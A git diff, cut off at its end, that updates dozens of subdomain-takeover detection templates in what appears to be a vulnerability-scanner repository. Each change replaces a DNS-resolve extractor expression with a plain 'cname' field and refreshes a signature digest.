1f23a7a038..e1ef294bd5 100644 --- a/http/takeovers/anima-takeover.yaml +++ b/http/takeovers/anima-takeover.yaml @@ -29,5 +29,5 @@ http: extractors: - type: dsl dsl: - - "resolve(Host, 'cname')" + - cname # digest: 4a0a00473045022052bc2aa8ee8306b3823bcb5602709089422854a4efc741cbe5fc42a38518a7270221009f05c449b7fddb5dadc6579dd533cf5c57db6b43308cedff609e52d8b97f112a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/announcekit-takeover.yaml b/http/takeovers/announcekit-takeover.yaml index 18696fa27f..bc666ede07 100644 --- a/http/takeovers/announcekit-takeover.yaml +++ b/http/takeovers/announcekit-takeover.yaml @@ -34,5 +34,5 @@ http: extractors: - type: dsl dsl: - - "resolve(Host, 'cname')" + - cname # digest: 4b0a00483046022100abf4b3ac11f8489ae50ed7777d1f7d75274fa69a6f4a9fdb621096c7276890d9022100ddc4b39e3a090dfd6f23f0454b07cd6fc159fc4b9671168dbd4d3f85b626dbed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/bigcartel-takeover.yaml b/http/takeovers/bigcartel-takeover.yaml index 3c7ec47c0e..9ec12cd270 100644 --- a/http/takeovers/bigcartel-takeover.yaml +++ b/http/takeovers/bigcartel-takeover.yaml @@ -33,5 +33,5 @@ http: extractors: - type: dsl dsl: - - "resolve(Host, 'cname')" + - cname # digest: 490a00463044022028493e5884364496cbe6db730031be69815e0db1681e8f82ceacc7cd72e7d35a022064ac6129e32c1bb9c265656259d8121e230e5339bced107b32285d2564920464:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/bitbucket-takeover.yaml b/http/takeovers/bitbucket-takeover.yaml index d333f2d0a3..b2f4f59272 100644 --- a/http/takeovers/bitbucket-takeover.yaml +++ b/http/takeovers/bitbucket-takeover.yaml @@ -35,5 +35,5 @@ http: extractors: - type: dsl dsl: - - "resolve(Host, 'cname')" + - cname # digest: 4b0a00483046022100800b04f4ce1fd3e4172c69ae962d1f36497dae9f92fb9adfa008f59e03b34c57022100eaf82edf3723c0158c2bd6f95e845b39cec747746577fb827de72bf03a2bbbfc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/campaignmonitor-takeover.yaml b/http/takeovers/campaignmonitor-takeover.yaml index 7697cef4cb..7954ed27c0 100644 --- a/http/takeovers/campaignmonitor-takeover.yaml +++ b/http/takeovers/campaignmonitor-takeover.yaml @@ -31,5 +31,5 @@ http: extractors: - type: dsl dsl: - - "resolve(Host, 'cname')" + - cname # digest: 4b0a00483046022100b819e2a332f9b5b7e20bb3d40809c79a572af68df43acc74cceec70c6ca2b263022100daabd6735cb9915204d98a7d66a3cf771c8485f50f54fa2d401f9726aaaf38ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/canny-takeover.yaml b/http/takeovers/canny-takeover.yaml index 0b0785760b..3653f0fccf 100644 --- a/http/takeovers/canny-takeover.yaml +++ b/http/takeovers/canny-takeover.yaml @@ -31,5 +31,5 @@ http: extractors: - type: dsl dsl: - - "resolve(Host, 'cname')" + - cname # digest: 4b0a00483046022100fdcb56474033a16495df92a420a76351d7817ea33497bf19673e71d271289ce2022100cfffee90b4b903e5be13da672bf2509c548c7b082d89337f5ad245230409697e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/cargo-takeover.yaml b/http/takeovers/cargo-takeover.yaml index cf619882f3..bfbc0a4d7d 100644 --- a/http/takeovers/cargo-takeover.yaml +++ b/http/takeovers/cargo-takeover.yaml @@ -29,5 +29,5 @@ http: extractors: - type: dsl dsl: - - "resolve(Host, 'cname')" + - cname # digest: 490a00463044022039c5b3256b28da9c9e9221e0023c40b4bf59550b34299d1025a9e3752546cdc20220697f0d05275826042cd6694b7964d3f91b47cacc86e1a7f346d33f2b67793608:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/cargocollective-takeover.yaml b/http/takeovers/cargocollective-takeover.yaml index f466dd4f64..3f95a21d51 100644 --- a/http/takeovers/cargocollective-takeover.yaml +++ b/http/takeovers/cargocollective-takeover.yaml @@ -31,5 +31,5 @@ http: extractors: - type: dsl dsl: - - "resolve(Host, 'cname')" + - cname # digest: 4a0a0047304502207891f1026ddf30a2dcef1e667b9e29c941a2b79f0392a0d0ef4cd6d5a7cdc974022100fd75665d6b068730f9b891b0535047a188904f9babb359f3e93a1490025d71f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/clever-takeover.yaml b/http/takeovers/clever-takeover.yaml index 7bacbdd456..a71d985daa 100644 --- a/http/takeovers/clever-takeover.yaml +++ b/http/takeovers/clever-takeover.yaml @@ -32,5 +32,5 @@ http: extractors: - type: dsl dsl: - - "resolve(Host, 'cname')" + - cname # digest: 4a0a00473045022100997963360f12bfd0cfd2950139969b09b58f492fe8bb7d3e87105c8f39be376002203355a8edcf3dd6dd71a699ca4a01ad3499f7001b39e48c7cae5265064ab55a3f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/flexbe-takeover.yaml b/http/takeovers/flexbe-takeover.yaml index 14af1203cf..b053c547f4 100644 --- a/http/takeovers/flexbe-takeover.yaml +++ b/http/takeovers/flexbe-takeover.yaml @@ -36,5 +36,5 @@ http: extractors: - type: dsl dsl: - - "resolve(Host, 'cname')" + - cname # digest: 4a0a00473045022058ef15819ab6fb25b5f79436a3f8d581e504c0f6f92f9dc3c18fa2478bf3c3f80221009fa3274b5d611c04ce851a3c53d8af98e913475ec2a8c006bf80591531f6954a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/frontify-takeover.yaml b/http/takeovers/frontify-takeover.yaml index 1765c296ab..84fc2838ac 100644 --- a/http/takeovers/frontify-takeover.yaml +++ b/http/takeovers/frontify-takeover.yaml @@ -31,5 +31,5 @@ http: extractors: - type: dsl dsl: - - "resolve(Host, 'cname')" + - cname # digest: 4b0a004830460221009c8f88d2710cb52115876d7245b631b675280b8c02b46e23284711ac5377fbac022100f9412dfc45bba2e7b8f47426ee6405789a9eaa8e4270d9a430c52efcba1a9ceb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/gemfury-takeover.yaml b/http/takeovers/gemfury-takeover.yaml index fcda77dd5d..9af6946737 100644 --- a/http/takeovers/gemfury-takeover.yaml +++ b/http/takeovers/gemfury-takeover.yaml @@ -33,5 +33,5 @@ http: extractors: - type: dsl dsl: - - "resolve(Host, 'cname')" + - cname # digest: 4a0a00473045022100a4a5a5c7f4cbdea4dfe6ba54f24e8d115c4b4ed97463e0b6f2f59089005693d402201739eab6a73212a6753bfc7014fef9f080667f4ecf1562df1d3ebdfe569a65b5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/getresponse-takeover.yaml b/http/takeovers/getresponse-takeover.yaml index 07d5ceb6ea..ec935918f4 100644 --- a/http/takeovers/getresponse-takeover.yaml +++ b/http/takeovers/getresponse-takeover.yaml @@ -29,5 +29,5 @@ http: extractors: - type: dsl dsl: - - "resolve(Host, 'cname')" + - cname # digest: 4a0a00473045022100c9544f43f7e76dae73b99c44544483505e22d05b811b3d3014ea7478651a13b50220183d82c1d47b04cd7433045c3b661617768399b5fde5465ae365d81b9ba8c1a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/ghost-takeover.yaml b/http/takeovers/ghost-takeover.yaml index ca4d085199..bbabf8e623 100644 --- a/http/takeovers/ghost-takeover.yaml +++ b/http/takeovers/ghost-takeover.yaml @@ -36,5 +36,4 @@ http: extractors: - type: dsl dsl: - - "resolve(Host, 'cname')" -# digest: 4a0a0047304502207d91f932ce2ed1fc8924b00af9eb0c421fc0b92e0853f8fba2bae8afbbadea8a022100bf5af14ddb7c21368dd33249a39ab3b3932b4b75d1abb3bb8f75367529854309:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - cname \ No newline at end of file diff --git a/http/takeovers/gitbook-takeover.yaml b/http/takeovers/gitbook-takeover.yaml index 50f2236200..3fef52d089 100644 --- a/http/takeovers/gitbook-takeover.yaml +++ b/http/takeovers/gitbook-takeover.yaml @@ -32,5 +32,5 @@ http: extractors: - type: dsl dsl: - - "resolve(Host, 'cname')" + - cname # digest: 490a00463044022007ba7ff01d235a698a165e83cd1ec53b8f0f2c1c9df81dc1d1c1c7263ab997ae02202a1d4d50779a1120aa7674e464dcf262df262770bd0b4f34c2508b625dc1b0ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/github-takeover.yaml b/http/takeovers/github-takeover.yaml index efbbe38619..6fc39e9e2e 100644 --- a/http/takeovers/github-takeover.yaml +++ b/http/takeovers/github-takeover.yaml @@ -38,5 +38,5 @@ http: extractors: - type: dsl dsl: - - "resolve(Host, 'cname')" + - cname # digest: 4b0a00483046022100da69c3934ab685046db34fd5b530f9a94a05843b80c64b9bd0c124de5f99b3bc022100baeb8a7a60d2cc78907aa619a65bba8bfaff269182513a5260167813f14407bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/gohire-takeover.yaml b/http/takeovers/gohire-takeover.yaml index 129a90987e..02eb91c8ca 100644 --- a/http/takeovers/gohire-takeover.yaml +++ b/http/takeovers/gohire-takeover.yaml @@ -33,5 +33,5 @@ http: extractors: - type: dsl dsl: - - "resolve(Host, 'cname')" + - cname # digest: 490a00463044022037b397c0657ab6c3ea60424bfe1551b5d4674a30c654fd687baee22a578595b2022051cd6752d29108a910e38993aea9fcb8b51bb6596d82f4f485cc8c21a81e939d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/hatenablog-takeover.yaml b/http/takeovers/hatenablog-takeover.yaml index da60ab0204..4a8c0ccdbc 100644 --- a/http/takeovers/hatenablog-takeover.yaml +++ b/http/takeovers/hatenablog-takeover.yaml @@ -30,5 +30,5 @@ http: extractors: - type: dsl dsl: - - "resolve(Host, 'cname')" + - cname # digest: 4b0a004830460221008f1bd167e0d54c56419cfacf1f579b4a94ec793afcd2d71e41178d2c9911970f022100ea66618ec13a8f8f92c100bf9172d271c29ac6c890aebdec3a5745077d0549ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/helpdocs-takeover.yaml b/http/takeovers/helpdocs-takeover.yaml index 6e2987827d..cd7ec567f1 100644 --- a/http/takeovers/helpdocs-takeover.yaml +++ b/http/takeovers/helpdocs-takeover.yaml @@ -32,5 +32,5 @@ http: extractors: - type: dsl dsl: - - "resolve(Host, 'cname')" + - cname # digest: 490a004630440220482c6b083ccbabb1e2158009605bfe5dcbccf91764b760ebdaf751144015b6db022038fc8950954039feeb1f93f637a0bc96e0e5c1f248fdfc15d231bd01ec86e675:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/helpjuice-takeover.yaml b/http/takeovers/helpjuice-takeover.yaml index ec269613db..8005ecfff4 100644 --- a/http/takeovers/helpjuice-takeover.yaml +++ b/http/takeovers/helpjuice-takeover.yaml @@ -29,5 +29,5 @@ http: extractors: - type: dsl dsl: - - "resolve(Host, 'cname')" + - cname # digest: 4b0a00483046022100a35d9fdeea4128eb38c04dea1b5d3693810c966a13e599dcc2be949fe36554820221009a7e1fa76dcfb51b1c2fe04202c129cf7b893465f48049feccaeb79258a0a366:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/helprace-takeover.yaml b/http/takeovers/helprace-takeover.yaml index 6201edd5b8..adc1f92aa2 100644 --- a/http/takeovers/helprace-takeover.yaml +++ b/http/takeovers/helprace-takeover.yaml @@ -30,5 +30,5 @@ http: extractors: - type: dsl dsl: - - "resolve(Host, 'cname')" + - cname # digest: 4a0a00473045022027d08153b33fe40911fd49617721948492c62cc3d3d544c406599e8961424af5022100943309fe155a4cf41828089ec841eaeadb44e39a7e7c66113725e3eb40bf14e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/helpscout-takeover.yaml b/http/takeovers/helpscout-takeover.yaml index 35568e8bfb..ad5be727c2 100644 --- a/http/takeovers/helpscout-takeover.yaml +++ b/http/takeovers/helpscout-takeover.yaml @@ -29,5 +29,5 @@ http: extractors: - type: dsl dsl: - - "resolve(Host, 'cname')" + - cname # digest: 4b0a00483046022100a14491277e022059a4d27c53642a673066e07741fc8df713ef9fca58978f2036022100a50455f2613321de05c5f0d730176a9d9edaef962b414b6dd344438c18b8c47d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/hubspot-takeover.yaml b/http/takeovers/hubspot-takeover.yaml index 4f9339ee79..f1a2b35efe 100644 --- a/http/takeovers/hubspot-takeover.yaml +++ b/http/takeovers/hubspot-takeover.yaml @@ -32,5 +32,5 @@ http: extractors: - type: dsl dsl: - - "resolve(Host, 'cname')" + - cname # digest: 490a0046304402206ce71ca779690190161ec883a0f6a10d9d38905219eba277ea6dfb04d7466cd4022027eb6f3bd3010a4a5d68befc5b652eac733f20cefb5f1f9019d1f5020f40e148:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/intercom-takeover.yaml b/http/takeovers/intercom-takeover.yaml index 25e1528295..123559faf5 100644 --- a/http/takeovers/intercom-takeover.yaml +++ b/http/takeovers/intercom-takeover.yaml @@ -31,5 +31,5 @@ http: extractors: - type: dsl dsl: - - "resolve(Host, 'cname')" + - cname # digest: 4b0a004830460221009aef81a7fc6a59a2ba6de62e3772517f8c0dd2b1fb2c9c7cd325f9a7bea24645022100c585d84759bd8e0084076b7b4f684e29e878e894f643e4a16f0ec7c17ddf2b6d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/jazzhr-takeover.yaml b/http/takeovers/jazzhr-takeover.yaml index 1c9c75eeff..720498589b 100644 --- a/http/takeovers/jazzhr-takeover.yaml +++ b/http/takeovers/jazzhr-takeover.yaml @@ -29,5 +29,5 @@ http: extractors: - type: dsl dsl: - - "resolve(Host, 'cname')" + - cname # digest: 4a0a00473045022029f3b863ed50f24393d86e83c928ff07f9eb39bdeefdcd9093120debbfcdf049022100a00a29f9bd49422c3ee702f888dedd6d166e73eee1b56732cff1e8939c938b60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/jetbrains-takeover.yaml b/http/takeovers/jetbrains-takeover.yaml index bb54068f8b..6125294f59 100644 --- a/http/takeovers/jetbrains-takeover.yaml +++ b/http/takeovers/jetbrains-takeover.yaml @@ -29,5 +29,5 @@ http: extractors: - type: dsl dsl: - - "resolve(Host, 'cname')" + - cname # digest: 490a0046304402205e36ff70f8a0907caca607574e3bba5cdf53e03b530dfc7418b8dd26746b6b3c02203a03022c7dd004ea62891eeda1133a8bbb4cf7596d269f047d4f2b5abe6d921f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/kinsta-takeover.yaml b/http/takeovers/kinsta-takeover.yaml index bf27514292..a19db3cfad 100644 --- a/http/takeovers/kinsta-takeover.yaml +++ b/http/takeovers/kinsta-takeover.yaml @@ -29,5 +29,5 @@ http: extractors: - type: dsl dsl: - - "resolve(Host, 'cname')" + - cname # digest: 4a0a00473045022100c1180edbebb878f2804b827537d695ea36e9d3cab087819d029d1e89230fae4302203cd91b5cdc16051046d223660b4487a540a298336b4347f0e7c03f56cef75d73:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/launchrock-takeover.yaml b/http/takeovers/launchrock-takeover.yaml index b42c9d55ee..57430e88c4 100644 --- a/http/takeovers/launchrock-takeover.yaml +++ b/http/takeovers/launchrock-takeover.yaml @@ -29,5 +29,5 @@ http: extractors: - type: dsl dsl: - - "resolve(Host, 'cname')" + - cname # digest: 4a0a00473045022024aad780c453db09ec0aa72dc5d26dd07ea0307eefb7cbd8ad014380bfeca9d7022100ede17fb171220b83769a563fa26398d7be46bd50363522e38f008bb2b15c8cc4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/leadpages-takeover.yaml b/http/takeovers/leadpages-takeover.yaml index 36d66f2b0c..7753f735f6 100644 --- a/http/takeovers/leadpages-takeover.yaml +++ b/http/takeovers/leadpages-takeover.yaml @@ -34,5 +34,5 @@ http: extractors: - type: dsl dsl: - - "resolve(Host, 'cname')" + - cname # digest: 4a0a00473045022100a7abea52b53bc6e3b854fe480b6ceddf1d28a773c7cb45b063cb84894dce86df0220023489a7dfa027e01a533d41eb0242aa9c7693238d060be9e9546e468c6b7c93:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/lemlist-takeover.yaml b/http/takeovers/lemlist-takeover.yaml index bab53dabe3..19ccfb9965 100644 --- a/http/takeovers/lemlist-takeover.yaml +++ b/http/takeovers/lemlist-takeover.yaml @@ -33,5 +33,5 @@ http: extractors: - type: dsl dsl: - - "resolve(Host, 'cname')" + - cname # digest: 4a0a00473045022100b12fa0b4978f85ed3cbe41639ef1128582cc49f9cbdf4a80f3a5bdb0be0bee31022045c0a3b23c1b9d3d1ef6be6d6259807aecab1191bf352df7c7f035044e3c5497:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/mashery-takeover.yaml b/http/takeovers/mashery-takeover.yaml index d04590f260..094f3acd89 100644 --- a/http/takeovers/mashery-takeover.yaml +++ b/http/takeovers/mashery-takeover.yaml @@ -29,5 +29,5 @@ http: extractors: - type: dsl dsl: - - "resolve(Host, 'cname')" + - cname # digest: 4a0a0047304502201149e8f9fc9b0d0351c9ad314e60423a0868e8fae542b3a1ac7993dba931ef1d0221008049d9334895aef36c83670111facb54c8a21f0d0c0fda7ac1fab4f2a5238075:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/meteor-takeover.yaml b/http/takeovers/meteor-takeover.yaml index 30a7c0ff72..be33d35a10 100644 --- a/http/takeovers/meteor-takeover.yaml +++ b/http/takeovers/meteor-takeover.yaml @@ -25,5 +25,5 @@ http: extractors: - type: dsl dsl: - - "resolve(Host, 'cname')" + - cname # digest: 4b0a00483046022100dd786b650d96f7b610f6fabb775fb0a1bdbdc399098915fed785dc96c4096290022100efa3ad374411b3b54f0901c2147f72f158c6e217fcf25d1ecc77b2ad9a38a28f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/netlify-takeover.yaml b/http/takeovers/netlify-takeover.yaml index c8ab4ed7bc..d5d4151761 100644 --- a/http/takeovers/netlify-takeover.yaml +++ b/http/takeovers/netlify-takeover.yaml @@ -38,5 +38,5 @@ http: extractors: - type: dsl dsl: - - "resolve(Host, 'cname')" + - cname # digest: 4a0a0047304502204764f51efe7fea4b2004ff43b29b32c53238303e8951f73f30fbf6bd76e1e7b8022100cb22252706a3c243c470c662f9f71fa85726f93f718d7fe53b3e5147a828750b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/ngrok-takeover.yaml b/http/takeovers/ngrok-takeover.yaml index 4f2bf624ce..91b4b8f8ac 100644 --- a/http/takeovers/ngrok-takeover.yaml +++ b/http/takeovers/ngrok-takeover.yaml @@ -30,5 +30,5 @@ http: extractors: - type: dsl dsl: - - "resolve(Host, 'cname')" + - cname # digest: 4a0a00473045022100be3ad2b3fe9c69371245fb062c73d6fef40199eed88340cee28ff023664fa76202203c6a116f08d99806c26409d9284df5ac6c93e5c5886bb79b8824e8e641c55d70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/pagewiz-takeover.yaml b/http/takeovers/pagewiz-takeover.yaml index f5c7986332..25b1f618f2 100644 --- a/http/takeovers/pagewiz-takeover.yaml +++ b/http/takeovers/pagewiz-takeover.yaml @@ -32,5 +32,5 @@ http: extractors: - type: dsl dsl: - - "resolve(Host, 'cname')" + - cname # digest: 4a0a00473045022100934d069e3bf75bd8206fbf531673a2d73e303c35f6a572ba6086c22a1f7b1ab402204e9b7508bb47942f8d3575b0284ca41734db910ce460d81cb9a1604d6c9a00db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/pantheon-takeover.yaml b/http/takeovers/pantheon-takeover.yaml index 3febab9dae..d750ec25ea 100644 --- a/http/takeovers/pantheon-takeover.yaml +++ b/http/takeovers/pantheon-takeover.yaml @@ -34,5 +34,5 @@ http: extractors: - type: dsl dsl: - - "resolve(Host, 'cname')" + - cname # digest: 4a0a004730450221008c7dd4e22a1d4fde29ea63656635b7adbc8f5abf044130945e4a69df607215c00220629314f1d78cd8df1bde642f05b1febd922fd801bfbf4e5980a29defe2a57e69:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/pingdom-takeover.yaml b/http/takeovers/pingdom-takeover.yaml index 16006c7910..6c26ca21cd 100644 --- a/http/takeovers/pingdom-takeover.yaml +++ b/http/takeovers/pingdom-takeover.yaml @@ -30,5 +30,5 @@ http: extractors: - type: dsl dsl: - - "resolve(Host, 'cname')" + - cname # digest: 4b0a00483046022100b2bc3e8ad65a671ca4425f64dd44280a4809d55718706a6f6f005a5ee28d7420022100a00a7a1e403a95d522aa6fbe0fc30e92505eac559c53a8503cbb574c6b5e32af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/proposify-takeover.yaml b/http/takeovers/proposify-takeover.yaml index d1057f9a6a..44b0783c34 100644 --- a/http/takeovers/proposify-takeover.yaml +++ b/http/takeovers/proposify-takeover.yaml @@ -29,5 +29,5 @@ http: extractors: - type: dsl dsl: - - "resolve(Host, 'cname')" + - cname # digest: 490a00463044022034258f2fca01e39007e9d33458f41536b1903c50ed5ddacba8805bfded9c10b80220441b9f318c24301fdeaf66b9e1fe593a01aa1988cbb0b3fed8fd2c456336a667:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/readme-takeover.yaml b/http/takeovers/readme-takeover.yaml index 9462227e2f..e486ff28b9 100644 --- a/http/takeovers/readme-takeover.yaml +++ b/http/takeovers/readme-takeover.yaml @@ -29,5 +29,5 @@ http: extractors: - type: dsl dsl: - - "resolve(Host, 'cname')" + - cname # digest: 4b0a00483046022100ce949e30e457000311f37d3f507775ffb4ad50c2b614cf12956ce4e7805bf313022100a1f155c7443b863e38dbe30ba9b02e94aa7504be85e029d837887d7c25d2a045:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/readthedocs-takeover.yaml b/http/takeovers/readthedocs-takeover.yaml index 61665cd327..eb448090fe 100644 --- a/http/takeovers/readthedocs-takeover.yaml +++ b/http/takeovers/readthedocs-takeover.yaml @@ -29,5 +29,5 @@ http: extractors: - type: dsl dsl: - - "resolve(Host, 'cname')" + - cname # digest: 490a0046304402205b73bb8a1171ae52b384c6eb817ed2be50e3e243f754c2f19806a5d4ae45a35f02205fd4870a807fb475b6e1322e6135385950d8b1ecca8e5fbfcea83c1b364362a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/shopify-takeover.yaml b/http/takeovers/shopify-takeover.yaml index 293699db8a..9a720d38a1 100644 --- a/http/takeovers/shopify-takeover.yaml +++ b/http/takeovers/shopify-takeover.yaml @@ -45,5 +45,5 @@ http: extractors: - type: dsl dsl: - - "resolve(Host, 'cname')" + - cname # digest: 4a0a004730450220204856f7e988020fdcb4ae366636d5955319303a33a7b6e83099bef036aa4c72022100b0d493e583dcb4b1d9db9197368a4405bef1b303b74fcc3abe8b99fe13ff46e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/short-io.yaml b/http/takeovers/short-io.yaml index 6a800246ac..d6984ccdfe 100644 --- a/http/takeovers/short-io.yaml +++ b/http/takeovers/short-io.yaml @@ -31,5 +31,5 @@ http: extractors: - type: dsl dsl: - - "resolve(Host, 'cname')" + - cname # digest: 490a0046304402200547045a93bd650f749334f481c7e85b6b70c5bda668debc7edc236f405f2170022022336404658166b4297713e33a77f79de3c3cca8f25630301b2e4c90b2778c7b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/simplebooklet-takeover.yaml b/http/takeovers/simplebooklet-takeover.yaml index 9f0bfbdf57..6c92ab6992 100644 --- a/http/takeovers/simplebooklet-takeover.yaml +++ b/http/takeovers/simplebooklet-takeover.yaml @@ -29,5 +29,5 @@ http: extractors: - type: dsl dsl: - - "resolve(Host, 'cname')" + - cname # digest: 4b0a00483046022100ec8a2d5fa51dea56e883426cf67a8d347db6169360c9336c06f36bf5f09efede022100f5157c422980294a6369eaf2c985ae49681e7a1438c5ee44e4b42497bed2b161:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/smartjob-takeover.yaml b/http/takeovers/smartjob-takeover.yaml index 81927b2c17..48accc5caf 100644 --- a/http/takeovers/smartjob-takeover.yaml +++ b/http/takeovers/smartjob-takeover.yaml @@ -31,5 +31,5 @@ http: extractors: - type: dsl dsl: - - "resolve(Host, 'cname')" + - cname # digest: 4a0a0047304502206d2af6a49847e8d78c4804f876d0ccda8d71bdbe74d91a0a9d3e9c074428b07c022100e95814e3f5de541f6c2a0da04d93f11fb16fcd17a1db33c638d383e6ff9d9e99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/smugmug-takeover.yaml b/http/takeovers/smugmug-takeover.yaml index c8d469ccbb..d9d54e2d31 100644 --- a/http/takeovers/smugmug-takeover.yaml +++ b/http/takeovers/smugmug-takeover.yaml @@ -29,5 +29,5 @@ http: extractors: - type: dsl dsl: - - "resolve(Host, 'cname')" + - cname # digest: 4a0a00473045022100b1226725e7147551cc8b60993b4c27b9404d7c216e70d947284e74f11f59f0b402200d4046e85887737a8f83988735889b386beaed3dc3011dd2832b5a038810ee4b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/softr-takeover.yaml b/http/takeovers/softr-takeover.yaml index 2984a73259..7d1b8213a6 100644 --- a/http/takeovers/softr-takeover.yaml +++ b/http/takeovers/softr-takeover.yaml @@ -35,5 +35,5 @@ http: extractors: - type: dsl dsl: - - "resolve(Host, 'cname')" + - cname # digest: 4a0a00473045022100f773bd5a97c78de8be263cdf809ec456f7c2eb6b32f2486fb1e61a99d2cd51fb02201bfdd4f5a49437f0edcee10f3c62c501e26f12289b66e2ceb03200b2c14511c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/sprintful-takeover.yaml b/http/takeovers/sprintful-takeover.yaml index ed94c816dd..42cdbae969 100644 --- a/http/takeovers/sprintful-takeover.yaml +++ b/http/takeovers/sprintful-takeover.yaml @@ -38,5 +38,5 @@ http: extractors: - type: dsl dsl: - - "resolve(Host, 'cname')" + - cname # digest: 490a0046304402202faae6dd1e1075349daf0b9382c13500e2c12d16a131791a95c98e025a80543202200a4d444f499455ad564b5cf9be22d31ce9e001595e92ab77b2b91e4160940d36:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/squadcast-takeover.yaml b/http/takeovers/squadcast-takeover.yaml index b457b6b542..b1f7204f67 100644 --- a/http/takeovers/squadcast-takeover.yaml +++ b/http/takeovers/squadcast-takeover.yaml @@ -37,5 +37,5 @@ http: extractors: - type: dsl dsl: - - "resolve(Host, 'cname')" + - cname # digest: 4b0a004830460221009bd4e2c96f378728a169b30d9f8dbb6709bb0b212fd48297c86d27d05bf8e6e0022100b8618a8aa2e41507730211937599b02a39cce1b8662ae0da5f0ea632ee222517:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/strikingly-takeover.yaml b/http/takeovers/strikingly-takeover.yaml index 91d82b721e..da94fe5957 100644 --- a/http/takeovers/strikingly-takeover.yaml +++ b/http/takeovers/strikingly-takeover.yaml @@ -32,5 +32,5 @@ http: extractors: - type: dsl dsl: - - "resolve(Host, 'cname')" + - cname # digest: 4b0a004830460221009e5d298567c427fc0d1a199cbb2634c5fdc7f11b95dad2657d2314b3675056e5022100d08db1a81efc9de0013e99f5968cb948ee6cca04c57c331bd6aa6d23d194a859:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/surge-takeover.yaml b/http/takeovers/surge-takeover.yaml index 0d2a016cb3..7fcb61e0b9 100644 --- a/http/takeovers/surge-takeover.yaml +++ b/http/takeovers/surge-takeover.yaml @@ -33,5 +33,5 @@ http: extractors: - type: dsl dsl: - - "resolve(Host, 'cname')" + - cname # digest: 4b0a00483046022100c5e76f50cc351a887ab8bbbc9256b132fc7fd3ce128f1107cfa8a3566a8ade57022100bc48b903cb92bea6c0303e77b1d142eacd8dcd1edb4466bc76781f82e171a7a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/surveygizmo-takeover.yaml b/http/takeovers/surveygizmo-takeover.yaml index 4461ec40bf..bb8a667e63 100644 --- a/http/takeovers/surveygizmo-takeover.yaml +++ b/http/takeovers/surveygizmo-takeover.yaml @@ -29,5 +29,5 @@ http: extractors: - type: dsl dsl: - - "resolve(Host, 'cname')" + - cname # digest: 4a0a0047304502204ac3696d5bb6b669b0d7fd8ac6603a2cc19d89b9f5cf468b9c212938ea1886dc022100c8c75e133f38a8a81eef8cea037b689be65102e87094287ac76f6db0aff68f22:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/surveysparrow-takeover.yaml b/http/takeovers/surveysparrow-takeover.yaml index 57e2850c03..6cb64cda4b 100644 --- a/http/takeovers/surveysparrow-takeover.yaml +++ b/http/takeovers/surveysparrow-takeover.yaml @@ -32,5 +32,5 @@ http: extractors: - type: dsl dsl: - - 